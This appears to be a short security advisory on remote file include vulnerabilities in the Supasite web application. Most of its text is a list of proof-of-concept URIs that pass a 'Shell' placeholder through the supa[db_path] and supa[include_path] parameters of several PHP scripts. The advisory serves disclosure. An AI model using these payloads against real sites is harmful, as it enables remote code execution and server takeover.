|
|
Supasite Multiple Remote File Include Vulnerabilities
Attackers can use a browser to exploit these issues. The following proof-of-concept URIs are available: http://www.example.com/supasite/common_functions.php?supa[db_path]=Shell http://www.example.com/supasite/admin_auth_cookies.php?supa[db_path]=Shell http://www.example.com/supasite/admin_mods.php?supa[db_path]=Shell http://www.example.com/supasite/admin_news.php?supa[db_path]=Shell http://www.example.com/supasite/admin_settings.php?supa[include_path]=Shell http://www.example.com/supasite/admin_topics.php?supa[db_path]=Shell http://www.example.com/supasite/admin_users.php?supa[db_path]=Shell http://www.example.com/supasite/admin_utilities.php?supa[db_path]=Shell http://www.example.com/supasite/backend_site.php?supa[include_path]=Shell http://www.example.com/supasite/site_comment.php?supa[db_path]=Shell http://www.example.com/supasite/site_news.php?supa[db_path]=Shell |
|
Privacy Statement |